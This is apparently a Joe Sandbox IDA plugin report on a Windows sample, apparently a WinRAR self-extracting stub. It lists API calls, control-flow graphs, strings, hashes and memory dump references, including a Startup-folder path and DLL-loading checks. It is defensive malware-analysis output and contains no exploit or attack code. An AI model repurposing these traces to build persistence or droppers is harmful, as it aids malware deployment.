                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D31EB3
                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00D54D24,00000000), ref: 00D31ED1
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D31F29
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D31F3E
                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00D54D24,?,00000000,?,00000800), ref: 00D31F92
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00D54D24,00000800,?,00000000,?,00000800), ref: 00D31FBC
                                                                              • GetFileAttributesW.KERNEL32(?,?,00D54DEC,00000800), ref: 00D31FF8
                                                                                • Part of subcall function 00D31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D31B56
                                                                                • Part of subcall function 00D31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D3063A,Crypt32.dll,00000000,00D306B4,00000200,?,00D30697,00000000,00000000,?), ref: 00D31B78
                                                                              • _swprintf.LIBCMT ref: 00D3206A
                                                                              • _swprintf.LIBCMT ref: 00D320B6
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              • AllocConsole.KERNEL32 ref: 00D320BE
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00D320C8
                                                                              • AttachConsole.KERNEL32(00000000), ref: 00D320CF
                                                                              • _wcslen.LIBCMT ref: 00D320E4
                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D320F5
                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00D320FC
                                                                              • Sleep.KERNEL32(00002710), ref: 00D32107
                                                                              • FreeConsole.KERNEL32 ref: 00D3210D
                                                                              • ExitProcess.KERNEL32 ref: 00D32115
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                              • API String ID: 1207345701-3298887752
                                                                              • Opcode ID: 0c8d268e09d9d43b75ef4db73b70b96adbc1bedd901a1d76fe26a3d68ef39013
                                                                              • Instruction ID: aeeb46c2060ee2825e9f9f049a06d085ff5617864273582e60ff974132b91ca3
                                                                              • Opcode Fuzzy Hash: 0c8d268e09d9d43b75ef4db73b70b96adbc1bedd901a1d76fe26a3d68ef39013
                                                                              • Instruction Fuzzy Hash: 01D151B10087859BDB219F549859B9FBBE8EF8530AF50091DFE8596390DBB0858CCB73
                                                                              Function 00D3D884 Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 428windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 353 d3d884-d3d89c call d3fefc call d3ffd0 358 d3e552-d3e55d 353->358 359 d3d8a2-d3d8cc call d3c504 353->359 359->358 362 d3d8d2-d3d8d7 359->362 363 d3d8d8-d3d8e6 362->363 364 d3d8e7-d3d8fc call d3c11c 363->364 367 d3d8fe 364->367 368 d3d900-d3d915 call d33316 367->368 371 d3d922-d3d925 368->371 372 d3d917-d3d91b 368->372 374 d3d92b 371->374 375 d3e51e-d3e549 call d3c504 371->375 372->368 373 d3d91d 372->373 373->375 376 d3db03-d3db05 374->376 377 d3d932-d3d935 374->377 378 d3dbc1-d3dbc3 374->378 379 d3dba4-d3dba6 374->379 375->363 390 d3e54f-d3e551 375->390 376->375 383 d3db0b-d3db17 376->383 377->375 384 d3d93b-d3d995 call d3b65d call d2d200 call d2b93d call d2ba77 call d279e5 377->384 378->375 382 d3dbc9-d3dbd0 378->382 379->375 381 d3dbac-d3dbbc SetWindowTextW 379->381 381->375 382->375 386 d3dbd6-d3dbef 382->386 387 d3db2b-d3db30 383->387 388 d3db19-d3db2a call d48a79 383->388 442 d3dad4-d3dae9 call d2b9ca 384->442 393 d3dbf1 386->393 394 d3dbf7-d3dc05 call d44fa3 386->394 391 d3db32-d3db38 387->391 392 d3db3a-d3db45 call d3c67e 387->392 388->387 390->358 397 d3db4a-d3db4c 391->397 392->397 393->394 394->375 410 d3dc0b-d3dc14 394->410 404 d3db57-d3db77 call d44fa3 call d4521e 397->404 405 d3db4e-d3db55 call d44fa3 397->405 430 d3db90-d3db92 404->430 431 d3db79-d3db80 404->431 405->404 411 d3dc16-d3dc1a 410->411 412 d3dc3d-d3dc40 410->412 416 d3dc46-d3dc49 411->416 417 d3dc1c-d3dc24 411->417 412->416 419 d3dd25-d3dd33 call d3192f 412->419 424 d3dc56-d3dc71 416->424 425 d3dc4b-d3dc50 416->425 417->375 422 d3dc2a-d3dc38 call d3192f 417->422 432 d3dd35-d3dd49 call d436be 419->432 422->432 443 d3dc73-d3dcad 424->443 444 d3dcbb-d3dcc2 424->444 425->419 425->424 430->375 433 d3db98-d3db9f call d45219 430->433 437 d3db82-d3db84 431->437 438 d3db87-d3db8f call d48a79 431->438 452 d3dd56-d3dda7 call d3192f call d3c3ae GetDlgItem SetWindowTextW SendMessageW call d47306 432->452 453 d3dd4b-d3dd4f 432->453 433->375 437->438 438->430 459 d3d99a-d3d9ae SetFileAttributesW 442->459 460 d3daef-d3dafe call d2b953 442->460 470 d3dcb1-d3dcb3 443->470 471 d3dcaf 443->471 446 d3dcf0-d3dd13 call d44fa3 * 2 444->446 447 d3dcc4-d3dcdc call d44fa3 444->447 446->432 481 d3dd15-d3dd23 call d31907 446->481 447->446 463 d3dcde-d3dceb call d31907 447->463 488 d3ddac-d3ddb0 452->488 453->452 458 d3dd51-d3dd53 453->458 458->452 464 d3da54-d3da64 GetFileAttributesW 459->464 465 d3d9b4-d3d9e7 call d2cdc0 call d2caa0 call d44fa3 459->465 460->375 463->446 464->442 476 d3da66-d3da75 DeleteFileW 464->476 497 d3d9fa-d3da08 call d2d1c1 465->497 498 d3d9e9-d3d9f8 call d44fa3 465->498 470->444 471->470 476->442 480 d3da77-d3da7a 476->480 484 d3da7e-d3daaa call d24a20 GetFileAttributesW 480->484 481->432 493 d3da7c-d3da7d 484->493 494 d3daac-d3dac2 MoveFileW 484->494 488->375 492 d3ddb6-d3ddca SendMessageW 488->492 492->375 493->484 494->442 496 d3dac4-d3dace MoveFileExW 494->496 496->442 497->460 503 d3da0e-d3da4d call d44fa3 call d411b0 497->503 498->497 498->503 503->464
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D3D889
                                                                                • Part of subcall function 00D3C504: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D3C5EB
                                                                              • _wcslen.LIBCMT ref: 00D3DB4F
                                                                              • _wcslen.LIBCMT ref: 00D3DB58
                                                                              • SetWindowTextW.USER32(?,?), ref: 00D3DBB6
                                                                              • _wcslen.LIBCMT ref: 00D3DBF8
                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00D3DD40
                                                                              • GetDlgItem.USER32(?,00000066), ref: 00D3DD7B
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00D3DD8B
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup), ref: 00D3DD99
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D3DDC4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                              • String ID: %s.%d.tmp$<br>$C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 2804936435-647225159
                                                                              • Opcode ID: f5aa29a6bd80e4433500b33166273079b07d1a2fe5c67f86e6eb7cf0d489e303
                                                                              • Instruction ID: a27838d6d120faf1c9208d484c900801657e2d254598516ed1a6d636b6bf3742
                                                                              • Opcode Fuzzy Hash: f5aa29a6bd80e4433500b33166273079b07d1a2fe5c67f86e6eb7cf0d489e303
                                                                              • Instruction Fuzzy Hash: 75E15172900218ABDF24DBA4EC85AEE73BDEB04314F5440A6FA45E3194EE749E84CF70
                                                                              Function 00D2ED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D2ED90
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D2EDCC
                                                                                • Part of subcall function 00D2D6A7: _wcslen.LIBCMT ref: 00D2D6AF
                                                                                • Part of subcall function 00D31907: _wcslen.LIBCMT ref: 00D3190D
                                                                                • Part of subcall function 00D32ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D2CF18,00000000,?,?), ref: 00D32EEE
                                                                              • _wcslen.LIBCMT ref: 00D2F109
                                                                              • __fprintf_l.LIBCMT ref: 00D2F23C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                              • API String ID: 566448164-801612888
                                                                              • Opcode ID: a368fa9119adb71667490fdb4d8808ce7a6e06e6692379aab1eff1941cf9d9ba
                                                                              • Instruction ID: b282d7bee0fea398ef636a481681af9cc5ce92d88a611180030f36d062f579dd
                                                                              • Opcode Fuzzy Hash: a368fa9119adb71667490fdb4d8808ce7a6e06e6692379aab1eff1941cf9d9ba
                                                                              • Instruction Fuzzy Hash: 4B32DE71900228ABDF24EF68E841AEA77B4FF24708F44097AF94697281E771DD85CB70
                                                                              Function 00D3E619 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00D3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3C769
                                                                                • Part of subcall function 00D3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3C77A
                                                                                • Part of subcall function 00D3C758: IsDialogMessageW.USER32(000204C8,?), ref: 00D3C78E
                                                                                • Part of subcall function 00D3C758: TranslateMessage.USER32(?), ref: 00D3C79C
                                                                                • Part of subcall function 00D3C758: DispatchMessageW.USER32(?), ref: 00D3C7A6
                                                                              • GetDlgItem.USER32(00000068,00D81CF0), ref: 00D3E62D
                                                                              • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,00D3C9A9,00D560F0,00D81CF0,00D81CF0,00001000,?,00000000,?), ref: 00D3E655
                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3E660
                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00D545F4), ref: 00D3E66E
                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3E684
                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D3E69E
                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3E6E2
                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D3E6F0
                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3E6FF
                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3E726
                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00D5549C), ref: 00D3E735
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                              • String ID: \
                                                                              • API String ID: 3569833718-2967466578
                                                                              • Opcode ID: 765b3a766376c627d474350d19167423d56e750768d2d46911a5256509b48091
                                                                              • Instruction ID: 124b137881bb5998db667537ef69824554be5b5cb0aae44fcb338396f34188cf
                                                                              • Opcode Fuzzy Hash: 765b3a766376c627d474350d19167423d56e750768d2d46911a5256509b48091
                                                                              • Instruction Fuzzy Hash: 8131D071195B40AFD3019F24EC4EFAB3FACFB42B04F040908F5A1D6290CBA559088BB6
                                                                              Function 00D3B6D2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 824 d3b6d2-d3b6ef FindResourceW 825 d3b6f5-d3b706 SizeofResource 824->825 826 d3b7eb 824->826 825->826 827 d3b70c-d3b71b LoadResource 825->827 828 d3b7ed-d3b7f1 826->828 827->826 829 d3b721-d3b72c LockResource 827->829 829->826 830 d3b732-d3b747 GlobalAlloc 829->830 831 d3b7e3-d3b7e9 830->831 832 d3b74d-d3b756 GlobalLock 830->832 831->828 833 d3b7dc-d3b7dd GlobalFree 832->833 834 d3b75c-d3b77a call d42dc0 CreateStreamOnHGlobal 832->834 833->831 837 d3b7d5-d3b7d6 GlobalUnlock 834->837 838 d3b77c-d3b79e call d3b636 834->838 837->833 838->837 843 d3b7a0-d3b7a8 838->843 844 d3b7c3-d3b7d1 843->844 845 d3b7aa-d3b7be GdipCreateHBITMAPFromBitmap 843->845 844->837 845->844 846 d3b7c0 845->846 846->844
                                                                              APIs
                                                                              • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00D3C92D,00000066), ref: 00D3B6E5
                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00D3C92D,00000066), ref: 00D3B6FC
                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00D3C92D,00000066), ref: 00D3B713
                                                                              • LockResource.KERNEL32(00000000,?,?,?,00D3C92D,00000066), ref: 00D3B722
                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D3C92D,00000066), ref: 00D3B73D
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00D3B74E
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D3B772
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00D3B7D6
                                                                                • Part of subcall function 00D3B636: GdipAlloc.GDIPLUS(00000010), ref: 00D3B63C
                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D3B7B7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00D3B7DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                              • String ID: PNG
                                                                              • API String ID: 211097158-364855578
                                                                              • Opcode ID: 05a7c1725e35eb4cfe95da9b66a4c6c959e40fa78b1998d5a1b178efa1859ebb
                                                                              • Instruction ID: 9298c91a32eff528ad6f3251c37fa8059d316e99eec99721e9fe6f7b41c7067b
                                                                              • Opcode Fuzzy Hash: 05a7c1725e35eb4cfe95da9b66a4c6c959e40fa78b1998d5a1b178efa1859ebb
                                                                              • Instruction Fuzzy Hash: 53318FB1605702AFD7119F21EC88D2B7FA8EF857A6F090519FE05C2360EB31D884CAB1
                                                                              Function 00D4BB1B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 848 d4bb1b-d4bb34 849 d4bb36-d4bb46 call d5010c 848->849 850 d4bb4a-d4bb4f 848->850 849->850 857 d4bb48 849->857 852 d4bb51-d4bb59 850->852 853 d4bb5c-d4bb80 MultiByteToWideChar 850->853 852->853 855 d4bb86-d4bb92 853->855 856 d4bd13-d4bd26 call d40d7c 853->856 858 d4bb94-d4bba5 855->858 859 d4bbe6 855->859 857->850 862 d4bbc4-d4bbd5 call d4a7fe 858->862 863 d4bba7-d4bbb6 call d531d0 858->863 861 d4bbe8-d4bbea 859->861 866 d4bbf0-d4bc03 MultiByteToWideChar 861->866 867 d4bd08 861->867 862->867 873 d4bbdb 862->873 863->867 876 d4bbbc-d4bbc2 863->876 866->867 870 d4bc09-d4bc1b call d4c12c 866->870 871 d4bd0a-d4bd11 call d4bd83 867->871 878 d4bc20-d4bc24 870->878 871->856 877 d4bbe1-d4bbe4 873->877 876->877 877->861 878->867 880 d4bc2a-d4bc31 878->880 881 d4bc33-d4bc38 880->881 882 d4bc6b-d4bc77 880->882 881->871 885 d4bc3e-d4bc40 881->885 883 d4bcc3 882->883 884 d4bc79-d4bc8a 882->884 888 d4bcc5-d4bcc7 883->888 886 d4bca5-d4bcb6 call d4a7fe 884->886 887 d4bc8c-d4bc9b call d531d0 884->887 885->867 889 d4bc46-d4bc60 call d4c12c 885->889 892 d4bd01-d4bd07 call d4bd83 886->892 904 d4bcb8 886->904 887->892 902 d4bc9d-d4bca3 887->902 888->892 893 d4bcc9-d4bce2 call d4c12c 888->893 889->871 901 d4bc66 889->901 892->867 893->892 905 d4bce4-d4bceb 893->905 901->867 906 d4bcbe-d4bcc1 902->906 904->906 907 d4bd27-d4bd2d 905->907 908 d4bced-d4bcee 905->908 906->888 909 d4bcef-d4bcff WideCharToMultiByte 907->909 908->909 909->892 910 d4bd2f-d4bd36 call d4bd83 909->910 910->871
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D469A3,00D469A3,?,?,?,00D4BD6C,00000001,00000001,62E85006), ref: 00D4BB75
                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D4BD6C,00000001,00000001,62E85006,?,?,?), ref: 00D4BBFB
                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D4BCF5
                                                                              • __freea.LIBCMT ref: 00D4BD02
                                                                                • Part of subcall function 00D4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4DBEC,00000000,?,00D480B1,?,00000008,?,00D4A871,?,?,?), ref: 00D4A830
                                                                              • __freea.LIBCMT ref: 00D4BD0B
                                                                              • __freea.LIBCMT ref: 00D4BD30
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1414292761-0
                                                                              • Opcode ID: 360ab378ee618f4b50ae637b6a46cff85b9cc4191ca321bf8dbc4f4bac79da8f
                                                                              • Instruction ID: 531225ebecc5606d805fcc660d8242d1e5198b83d6078b43d8b4cea2d12cbf63
                                                                              • Opcode Fuzzy Hash: 360ab378ee618f4b50ae637b6a46cff85b9cc4191ca321bf8dbc4f4bac79da8f
                                                                              • Instruction Fuzzy Hash: 0D51E272A10216AFEB258F64CC81EBF77A9EF64764F19466AFC06D6150DB34DC80C6B0
                                                                              Function 00D3BD1B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 00D31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D31B56
                                                                                • Part of subcall function 00D31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D3063A,Crypt32.dll,00000000,00D306B4,00000200,?,00D30697,00000000,00000000,?), ref: 00D31B78
                                                                              • OleInitialize.OLE32(00000000), ref: 00D3BD34
                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D3BD6B
                                                                              • SHGetMalloc.SHELL32(00D6A460), ref: 00D3BD75
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                              • String ID: riched20.dll$3Ro
                                                                              • API String ID: 3498096277-3613677438
                                                                              • Opcode ID: a25cef6bb7dfdbe38c2f1d8454f389b1f32956420dc17b6ecf7862518e984b19
                                                                              • Instruction ID: 6ec342fe0b008a23e1833e633c158f3cbe878ced89620c594913d6ebdf0090c6
                                                                              • Opcode Fuzzy Hash: a25cef6bb7dfdbe38c2f1d8454f389b1f32956420dc17b6ecf7862518e984b19
                                                                              • Instruction Fuzzy Hash: C0F0F9B5D00209AFCB10AF99E8499EFFFFCEF84705F00445AE855E2254DBB456498BB1
                                                                              Function 00D2AB40 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 917 d2ab40-d2ab61 call d3ffd0 920 d2ab63-d2ab66 917->920 921 d2ab6c 917->921 920->921 922 d2ab68-d2ab6a 920->922 923 d2ab6e-d2ab7f 921->923 922->923 924 d2ab81 923->924 925 d2ab87-d2ab91 923->925 924->925 926 d2ab93 925->926 927 d2ab96-d2aba3 call d279e5 925->927 926->927 930 d2aba5 927->930 931 d2abab-d2abca CreateFileW 927->931 930->931 932 d2ac1b-d2ac1f 931->932 933 d2abcc-d2abee GetLastError call d2cf32 931->933 934 d2ac23-d2ac26 932->934 936 d2ac28-d2ac2d 933->936 942 d2abf0-d2ac13 CreateFileW GetLastError 933->942 934->936 937 d2ac39-d2ac3e 934->937 936->937 939 d2ac2f 936->939 940 d2ac40-d2ac43 937->940 941 d2ac5f-d2ac70 937->941 939->937 940->941 943 d2ac45-d2ac59 SetFileTime 940->943 944 d2ac72-d2ac8a call d3192f 941->944 945 d2ac8e-d2ac99 941->945 942->934 946 d2ac15-d2ac19 942->946 943->941 944->945 946->934
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D28243,?,00000005,?,00000011), ref: 00D2ABBF
                                                                              • GetLastError.KERNEL32(?,?,00D28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D2ABCC
                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D28243,?,00000005,?), ref: 00D2AC02
                                                                              • GetLastError.KERNEL32(?,?,00D28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D2AC0A
